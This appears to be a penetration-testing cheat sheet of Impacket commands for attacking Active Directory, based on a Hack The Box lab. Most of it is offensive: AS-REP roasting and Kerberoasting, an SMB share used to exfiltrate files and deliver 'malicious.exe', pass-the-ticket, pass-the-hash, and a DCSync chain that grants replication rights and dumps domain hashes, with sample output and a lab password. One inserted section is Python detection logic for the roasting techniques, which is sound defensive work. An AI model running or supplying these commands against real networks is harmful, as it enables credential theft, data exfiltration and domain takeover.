Kerberoasting
>impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 htb/andy
>for user in $(cat users.txt); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 htb/${user} | grep krb5asrep; done
The two commands above perform AS-REP roasting: they confirm whether the user has the 'Do not require Kerberos preauthentication' property set (UF_DONT_REQUIRE_PREAUTH) and, if so, return the AS-REP hash for offline cracking.
>impacket-GetUserSPNs -dc-ip [IP] '[Domain]/[ID]:[PW]' -save -outputfile [out]
Conduct Kerberoasting with GetUserSPNs to retrieve the service ticket hashes of accounts that have an SPN set.
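A defender's view of the two techniques above, as an added example that is not part of the original notes: detection logic for AS-REP roasting (Event 4768 with pre-authentication disabled) and Kerberoasting (Event 4769 RC4 ticket requests for user-owned service accounts), run over constructed sample records. Field names follow the Windows Security log; the hosts and accounts other than andy and svc-alfresco are made up.

```python
from collections import defaultdict

# Constructed sample records in the field layout of Windows Security events
# 4768 (TGT request) and 4769 (service-ticket request). Only andy and
# svc-alfresco come from the notes above; everything else is invented.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "andy", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.20"},
    {"EventID": 4769, "TargetUserName": "alice@HTB.LOCAL", "ServiceName": "svc-alfresco",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "alice@HTB.LOCAL", "ServiceName": "svc-web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "alice@HTB.LOCAL", "ServiceName": "svc-sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "bob@HTB.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.20"},
]

def is_asrep_roast(ev):
    """4768 where no pre-authentication was performed (PreAuthType 0): the KDC
    hands out an AS-REP to anyone who asks, and it can be cracked offline."""
    return (ev["EventID"] == 4768 and ev.get("PreAuthType") == "0"
            and not ev["TargetUserName"].endswith("$"))

def is_kerberoast(ev):
    """4769 asking for an RC4 (0x17) service ticket for a user-owned SPN.
    Machine accounts ($) and krbtgt have long random passwords, so tickets
    for them are not crackable in practice and are excluded."""
    svc = ev.get("ServiceName", "")
    return (ev["EventID"] == 4769 and ev.get("TicketEncryptionType") == "0x17"
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def roasting_alerts(events):
    """Per-event alerts as (technique, account or service, requesting client)."""
    alerts = []
    for ev in events:
        if is_asrep_roast(ev):
            alerts.append(("AS-REP roasting", ev["TargetUserName"], ev["IpAddress"]))
        elif is_kerberoast(ev):
            alerts.append(("Kerberoasting", ev["ServiceName"], ev["IpAddress"]))
    return alerts

def rc4_burst_sources(events, threshold=3):
    """GetUserSPNs requests a ticket for every SPN it finds, so one client
    pulling RC4 tickets for many distinct services is the stronger signal."""
    services = defaultdict(set)
    for ev in events:
        if is_kerberoast(ev):
            services[ev["IpAddress"]].add(ev["ServiceName"])
    return {ip: sorted(s) for ip, s in services.items() if len(s) >= threshold}
```

Moving service accounts to AES-only encryption and enforcing pre-authentication removes the conditions both rules look for, so the same checks double as a configuration audit.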
Transfer Files with SMB
>impacket-smbserver share . -smb2support -username NL -password NL
>Evil-WinRM* PS C:\Users> net use \\[IP]\share /u:NL NL
>Evil-WinRM* PS C:\Users> dir \\[IP]\share
>Evil-WinRM* PS C:\Users> copy file \\[IP]\share\file1
>Evil-WinRM* PS C:\Users> copy \\[IP]\share\malicious.exe .
Use smbserver.py to exfiltrate data:
1. Start an SMB server on the attacker's machine.
2. Mount the share on the victim's machine and check it with the dir command.
3. Copy the target file to the share, or copy the malicious exe from the share to the victim.
Pass the Ticket
>impacket-ticketConverter ticket1 ticket1.ccache
>export KRB5CCNAME=/path/to/ticket1.ccache;
>impacket-psexec [Domain Name]/[account]@[DNS hostname] -k -no-pass -dc-ip [IP] -debug
After retrieving a ticket through the AD Certificate Services vulnerability (CVE-2022-26923, AD CS domain escalation):
1. Convert the kirbi ticket (the format commonly used by Mimikatz) to a ccache (credential cache) ticket.
2. Pass the ticket with Impacket. Do not forget the -dc-ip option; the DNS hostname after the account is also vital. Try all the combinations if the command above doesn't work.
Pass the Hash
>impacket-wmiexec -hashes [hash] htb.local/NL@10.10.10.161
Use wmiexec to execute the PtH attack. Note that PowerShell can't be run from the wmiexec shell.
MSSQL client
>sudo impacket-mssqlclient [ID]:'[PW]'@[IP] -windows-auth
Access MS SQL with mssqlclient.
DCSync attack
>Evil-WinRM* PS C:\> net user NL
>Evil-WinRM* PS C:\> Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members NL
>Evil-WinRM* PS C:\> $username = "htb\NL"; $password = "PW"
>Evil-WinRM* PS C:\> $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
>Evil-WinRM* PS C:\> $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $secstr
>Evil-WinRM* PS C:\> Add-DomainObjectAcl -Credential $cred -PrincipalIdentity 'NL' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
>Evil-WinRM* PS C:\> net group 'Exchange Windows Permissions'
>root@kali# secretsdump.py svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435....ad3b435......
....
This is a DCSync attack (mimic domain controller replication, then request the password hashes). The classic use of DCSync is as a precursor to a Golden Ticket attack, since it can be used to retrieve the KRBTGT hash.
1. Confirm the account's permissions.
2. Escalate privileges to obtain DCSync rights.
3. Run secretsdump to retrieve the hashes for a PtH attack.
DCSync ports: 135 (RPC endpoint mapper), 445 (SMB) and the dynamic RPC port (49667 here).